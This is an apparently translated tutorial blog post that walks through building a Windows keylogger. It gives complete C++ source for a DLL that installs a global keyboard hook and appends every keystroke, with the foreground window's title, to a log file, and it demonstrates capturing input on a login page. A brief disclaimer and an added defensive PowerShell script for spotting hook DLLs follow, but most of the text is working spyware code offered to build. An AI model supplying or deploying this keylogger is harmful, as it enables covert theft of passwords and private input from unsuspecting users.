C++ hacker programming: a keylogger, implemented with the HOOK technique
There is a technique called HOOK, which people customarily just call a hook. Hooks have a fairly wide range of uses: input monitoring, API interception, message capture, and so on.
Today we are going to build a keylogger.
Build tool: Visual Studio 2019
Programming language: C++, naturally; would I put "C++" in the title if it were written in Python?
Technique: HOOK
One more thing I need to say:
The Cybersecurity Law of the People's Republic of China stipulates that stealing anyone else's information is illegal! This article is for technical reference only; if anyone uses the technique in this article to illegally steal other people's information, the author bears no legal responsibility whatsoever!
There are several kinds of HOOK technique; today I will introduce one of them: Windows hooks.
Windows hooks are further divided into global hooks and local hooks. A local hook targets a single thread, whereas a global hook targets the whole operating system: the system loads the hook procedure into every process that receives the hooked events, which is why it has to live in a DLL.
Open Visual Studio 2019, choose Create new project -> Dynamic-Link Library (DLL), as shown in the figure:
This is the function we will use, SetWindowsHookEx(), defined as follows:
```cpp
HHOOK SetWindowsHookEx(
    _In_     int       idHook,
    _In_     HOOKPROC  lpfn,
    _In_opt_ HINSTANCE hmod,
    _In_     DWORD     dwThreadId);
```
The parameters of SetWindowsHookEx():
idHook: the hook type; the one we need is WH_KEYBOARD.
lpfn: the address of the hook procedure, so we have to write a function for it.
hmod: the module handle of the DLL that contains the hook procedure.
dwThreadId: the ID of the thread to be hooked; if it is 0, every thread is hooked.
UnhookWindowsHookEx() removes the hook and is defined as follows:
```cpp
BOOL UnhookWindowsHookEx(_In_ HHOOK hhk);
```
hhk: the hook handle returned by SetWindowsHookEx().
Let's get hands-on!!!
First, export two functions:
```cpp
extern "C" __declspec(dllexport) BOOL SetHookOn();
extern "C" __declspec(dllexport) BOOL SetHookOff();
```
Initialization. Note that it is DllMain(), not DLLMain(); plenty of experienced people get this wrong.
```cpp
HHOOK g_keyHook = NULL;     // handle returned by SetWindowsHookEx()
HINSTANCE g_Inst = NULL;    // this DLL's module handle, saved in DllMain()
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam);

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    g_Inst = (HINSTANCE)hModule;
    return TRUE;
}
```
The function that turns the hook on:
```cpp
BOOL SetHookOn()
{
    // WH_KEYBOARD with dwThreadId = 0 installs a global hook; hmod must be the
    // DLL that contains KeyboardProc. The original looked itself up with
    // GetModuleHandle(L"鍵盤HOOK"); the handle saved in DllMain() is the same
    // module and does not depend on the DLL's file name.
    g_keyHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_Inst, 0);
    return g_keyHook != NULL;
}
```
The function that removes the hook:
```cpp
BOOL SetHookOff()
{
    if (g_keyHook == NULL) return FALSE;
    BOOL ok = UnhookWindowsHookEx(g_keyHook);
    g_keyHook = NULL;
    return ok;
}
```
The keyboard hook procedure; the first part fetches the title of the foreground window:
```cpp
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
    // Pass the message on without logging when the system tells us not to
    // process it (code < 0), when it is only being peeked (HC_NOREMOVE), or
    // when bit 30 of lParam says the key was already down (auto-repeat).
    // These checks come before fopen() so no FILE* leaks on the early returns,
    // which the original code did.
    if (code < 0 || code == HC_NOREMOVE || (lParam & 0x40000000))
        return CallNextHookEx(g_keyHook, code, wParam, lParam);

    // Foreground window and the process that owns it.
    HWND hWnd = GetForegroundWindow();
    DWORD dwProcess = 0;
    GetWindowThreadProcessId(hWnd, &dwProcess);
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcess);
    WCHAR wszProcessPath[MAX_PATH] = { 0 };
    DWORD dwSize = MAX_PATH;
    if (hProcess != NULL) {
        // Queried in the original but never written to the log.
        QueryFullProcessImageNameW(hProcess, 0, wszProcessPath, &dwSize);
        CloseHandle(hProcess);   // the original never closed this handle
    }
    CHAR szTitle[MAX_PATH] = { 0 };
    GetWindowTextA(hWnd, szTitle, MAX_PATH);

    FILE* fp = fopen("文件路徑", "a");
    if (fp == NULL)
        return CallNextHookEx(g_keyHook, code, wParam, lParam);

    // One log line per key press: "<window title>\t<key name>\r\n"
    char szKeyName[100] = { 0 };
    GetKeyNameTextA((LONG)lParam, szKeyName, 100);
    fwrite(szTitle, 1, strlen(szTitle), fp);
    fwrite("\t", 1, 1, fp);          // the original wrote 2 bytes here, i.e. the tab plus its NUL terminator
    fwrite(szKeyName, 1, strlen(szKeyName), fp);
    fwrite("\r\n", 1, 2, fp);
    fclose(fp);
    return CallNextHookEx(g_keyHook, code, wParam, lParam);
}
```
I did not write a file path in the first parameter of fopen(); create a txt file yourselves and put its path there.
Full code:
```cpp
#include "pch.h"                // VS DLL template precompiled header; pulls in <windows.h>
#include <stdio.h>
#include <string.h>
#pragma warning(disable:4996)   // silence the fopen() deprecation warning

extern "C" __declspec(dllexport) BOOL SetHookOn();
extern "C" __declspec(dllexport) BOOL SetHookOff();

HHOOK g_keyHook = NULL;     // handle returned by SetWindowsHookEx()
HINSTANCE g_Inst = NULL;    // this DLL's module handle, saved in DllMain()
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam);

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    g_Inst = (HINSTANCE)hModule;
    return TRUE;
}

BOOL SetHookOn()
{
    // Global WH_KEYBOARD hook; hmod is this DLL. The original used
    // GetModuleHandle(L"鍵盤HOOK"), which yields the same handle but only
    // if the DLL keeps exactly that file name.
    g_keyHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_Inst, 0);
    return g_keyHook != NULL;
}

BOOL SetHookOff()
{
    if (g_keyHook == NULL) return FALSE;
    BOOL ok = UnhookWindowsHookEx(g_keyHook);
    g_keyHook = NULL;
    return ok;
}

LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
    // Skip messages we must not process, peeks, and auto-repeats before
    // opening the file, so that no FILE* is leaked on the early returns.
    if (code < 0 || code == HC_NOREMOVE || (lParam & 0x40000000))
        return CallNextHookEx(g_keyHook, code, wParam, lParam);

    HWND hWnd = GetForegroundWindow();
    DWORD dwProcess = 0;
    GetWindowThreadProcessId(hWnd, &dwProcess);
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcess);
    WCHAR wszProcessPath[MAX_PATH] = { 0 };
    DWORD dwSize = MAX_PATH;
    if (hProcess != NULL) {
        QueryFullProcessImageNameW(hProcess, 0, wszProcessPath, &dwSize);   // queried but not logged
        CloseHandle(hProcess);
    }
    CHAR szTitle[MAX_PATH] = { 0 };
    GetWindowTextA(hWnd, szTitle, MAX_PATH);

    FILE* fp = fopen("", "a");   // put the path of your log file here
    if (fp == NULL)
        return CallNextHookEx(g_keyHook, code, wParam, lParam);

    char szKeyName[100] = { 0 };
    GetKeyNameTextA((LONG)lParam, szKeyName, 100);
    fwrite(szTitle, 1, strlen(szTitle), fp);
    fwrite("\t", 1, 1, fp);      // one byte, not the two (tab + NUL) the original wrote
    fwrite(szKeyName, 1, strlen(szKeyName), fp);
    fwrite("\r\n", 1, 2, fp);
    fclose(fp);
    return CallNextHookEx(g_keyHook, code, wParam, lParam);
}
```
Building this produces a .lib and a .dll file.
Create an MFC project and add two buttons, …
Project demonstration:
On the Baidu login page I entered the account 12345, then pressed Caps Lock once, then typed ABCD.
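Because a global WH_KEYBOARD hook gets its DLL loaded into every process that receives keyboard input, the same non-system DLL showing up in many unrelated processes is the footprint a defender can hunt for. The following PowerShell script is an added example, not part of the original post: it lists DLLs outside the system and Program Files trees that are loaded into at least $minHosts processes; the trusted-root list and the threshold are assumptions to tune per environment.

```powershell
# Added example (not from the original post): flag DLLs loaded from
# non-system paths into many processes at once, the pattern a global
# SetWindowsHookEx() hook DLL produces. Run in an elevated shell so that
# module lists of other users' processes are readable; protected processes
# still deny access and are skipped.
$trustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\")  # assumption: tune per host
$minHosts = 5                                                                               # assumption: tune per host

$hits = @{}   # dll path -> set of process IDs hosting it
foreach ($proc in Get-Process) {
    try { $mods = $proc.Modules } catch { continue }   # access denied / architecture mismatch
    foreach ($m in $mods) {
        $path = $m.FileName
        if (-not $path) { continue }
        $trusted = $false
        foreach ($root in $trustedRoots) {
            if ($path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { $trusted = $true; break }
        }
        if ($trusted) { continue }
        if (-not $hits.ContainsKey($path)) {
            $hits[$path] = [System.Collections.Generic.HashSet[int]]::new()
        }
        [void]$hits[$path].Add($proc.Id)
    }
}

# A hook DLL placed in a user-writable directory (the build output folder, a
# profile directory, a temp folder) will appear here with a high count.
$hits.GetEnumerator() |
    Where-Object { $_.Value.Count -ge $minHosts } |
    Sort-Object { $_.Value.Count } -Descending |
    ForEach-Object { "{0,4} processes  {1}" -f $_.Value.Count, $_.Key }
```

The heuristic misses a hook DLL dropped inside a trusted root, so treat a clean result as a starting point and pair it with file-system auditing of the log file the hook appends to.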
Summary
The above is the full content of "C++ hacker programming: a keylogger, implemented with the HOOK technique", collected and organized for you by 生活随笔; we hope the article helps you solve the problem you ran into.